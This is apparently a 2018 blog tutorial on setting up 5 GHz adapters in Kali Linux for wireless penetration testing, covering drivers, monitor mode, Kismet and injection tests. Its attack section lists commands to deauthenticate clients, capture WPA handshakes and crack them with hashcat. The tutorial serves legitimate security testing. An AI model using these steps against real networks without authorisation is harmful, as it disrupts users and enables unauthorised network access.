How to get your new 5 GHz wireless penetration gear up and working

Adam Toscher
Feb 15, 2018 · 9 min read

What new wireless .ac cards work with the latest rolling Kali release (4.14)?

root@kali:~# lsusb
Bus 001 Device 002: ID 148f:3572 Ralink Technology, Corp. RT3572 Wireless Adapter
# airmon-ng start wlan0
#history
1 apt-get update && apt-get upgrade
2 apt-get dist-upgrade

root@kali:~#uname -ar
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux

Install Wireless Drivers with Kali rolling

AWUS036ACH & AWUS1900

$  apt install realtek-rtl88xxau-dkms

Setting monitor mode manually

Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
$ sudo iwconfig wlan0 mode monitor
Set interface up
$sudo ip link set wlan0 up

for switching channels (interface must be up)

Set channel 6, width 40 MHz:$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:
$ sudo iw wlan0 set freq 5745 80 5775

for setting TX power (doesn’t work on every card)

$ sudo iwconfig wlan0 txpower 30or$ sudo iw wlan0 set txpower fixed 3000

Troubleshooting

apt-cache search linux-image
apt install dkms &&
apt-get install bc &&
apt-get install build-essential &&
apt-get install linux-headers-$(uname -r)
git clone https://github.com/aircrack-ng/rtl8812au

Test

airodump-ng wlan1 --band ag -M -U --wps --beacons -w captureallthewireless#ifconfig wlan0
#aireplay-ng wlan0 -9
10:09:24 Trying broadcast probe requests..

Install the latest Kismet


Installation instructions taken from kismet’s git page.sudo apt-get install build-essential git libmicrohttpd-dev \            zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev \ libpcap-dev libncurses5-dev libnm-dev libdw-dev \
libsqlite3-dev

Clone Kismet from git. If you haven't cloned Kismet before:

$ git clone https://www.kismetwireless.net/git/kismet.git
$ cd kismet
$ git pull
$ cd kismet
$ ./configure
Compile Kismet.

$ make

Kismet

./kismet wlan0
Point your browser at http://localhost:2501
Image for post
Image for post
Image for post
Image for post
elkentaro/KismetMobileDashboard

802.11ac Wireless Attacks

iwconfig wlan1 channel 149
root@kali:~# aireplay-ng |moreAireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
https://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP
10:53:12 Trying directed probe requests...
10:53:12 C4:E9:84:9F:60:71 - channel: 0 - 'shameless-karma!'
10:53:18 0/30: 0%
root@kali:~# iwconfig wlan1 channel 149
kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP
10:53:29 Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%
10:53:29 Injection is working!
aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \
-h E0:F8:XX:XX:XX:XX -e MYISPSUCKS-5G wlan0mon
# put your network device into monitor mode
Set interface down
$ sudo ip link set wlan0 down
Set monitor mode
# iwconfig wlan0 mode monitor
Set interface up
# ip link set wlan0 up
# listen for all nearby beacon frames to get target BSSID and
# airodump-ng wlan0 --band abg
Set 5 GHz channel
# iwconfig wlan0 channel 149
Start listening for the handshake
# airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0
Optionally deauth a connected client to force a handshake
# aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0
Convert cap to hccapx
# root@kali:~# aircrack-ng -J file.cap capture.hccap
Crack with hashcat:>hashcat.exe -m 2500 capture.hccapx rockyou.txt
git clone https://github.com/wpatoolkit/Cap-Converter

5 GHz Injection Tests

apt install realtek-rtl88xxau-dkms
root@kali:~# airmon-ngPHY Interface Driver  Chipsetphy0 wlan0  8814au  Realtek Semiconductor Corp. 
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU
802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
root@kali:~# iwconfig wlan2 channel 149root@kali:~# iwconfig wlan3 channel 56
root@kali:~# aireplay-ng -D -9 -i wlan2 wlan3
14:55:33 Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP
14:55:34 Trying directed probe requests...
14:55:34 P4:29:88:9F:60:71 - channel: 149 - 'ssid'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%
14:55:35 Injection is working!14:55:35 Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK
root@kali:~# iwconfig

wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off


lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off

wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off


eth0 no wireless extensions.
root@kali:~# iwconfig wlan1 channel 36
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
15:10:11 Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP
15:10:13 Trying directed probe requests...
15:10:13 BF:E9:54:9F:T0:71 - channel: 149 - 'shameonyou'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%
15:10:13 Injection is working!15:10:13 Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed

root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions.
wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off


wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off


wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

eth0 no wireless extensions.
root@kali:~# airmon-ngPHY Interface Driver Chipsetphy0 wlan0 8814au Realtek Semiconductor Corp.
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
root@kali:~# aireplay-ng -D -9 wlan0 wlan1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -D -9 wlan1
15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D -9 wlan1
15:20:21 Trying broadcast probe requests...
15:20:21 Injection is working!
15:20:23 Found 1 AP
15:20:23 Trying directed probe requests...
15:20:23 V4:E9:F4:9F:Z0:71 - channel: 149 - 'yourssidrules'
15:20:23 Ping (min/avg/max): 0.901ms/10.325ms/14.429ms Power: -26.00
15:20:23 30/30: 100%
root@kali:~# aireplay-ng -D -9 wlan0
15:20:47 Trying broadcast probe requests...
15:20:49 No Answer...
15:20:49 Found 0 APs
root@kali:~# airmon-ng
PHY Interface Driver Chipsetphy6 wlan0 8814au Realtek Semiconductor Corp. - partially working
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 - woring

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store